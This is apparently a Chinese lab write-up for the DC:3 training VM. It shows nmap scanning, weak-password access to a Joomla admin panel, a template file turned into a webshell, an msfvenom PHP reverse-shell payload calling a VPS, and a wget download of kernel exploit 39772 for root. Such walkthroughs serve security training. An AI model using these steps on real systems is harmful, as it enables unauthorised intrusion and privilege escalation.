DC:3靶机 通关详解

信息收集

nmap -sS -O 192.168.45.0/24

在这里插入图片描述

nmap -A -p- 192.168.45.134

在这里插入图片描述
访问80端口
在这里插入图片描述
扫个目录
在这里插入图片描述
访问administrator目录,发现是joomla的cms
在这里插入图片描述

拿websehll

顺手尝试弱口令,猜测账号admin
在这里插入图片描述
在这里插入图片描述
在extensions template下有上传点在这里插入图片描述
我直接将error.php改成了后门
然后访问192.168.45.134
蚁剑连上
在这里插入图片描述
在这尝试用nc连接拿稳点的shell在这里插入图片描述
发现没有-e参数 那么用msf连

msfvenom -p php/meterpreter/reverse_tcp lhost=vps的ip地址 lport=9000

生成php代码
在这里插入图片描述
写入网站并访问
在这里插入图片描述

提权

有了稳定的shell后考虑提权
尝试suid提权无果
也没有什么定时任务
sudo也不知道命令,考虑看看系统内核版本
在这里插入图片描述
在这里插入图片描述

searchsploit ubuntu

这里使用39772的那个exp
下载后上传到vps
然后下载到靶机

wget http://xxxxxxxxx/39772.zip

解压完后直接运行
在这里插入图片描述
在这里插入图片描述
结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值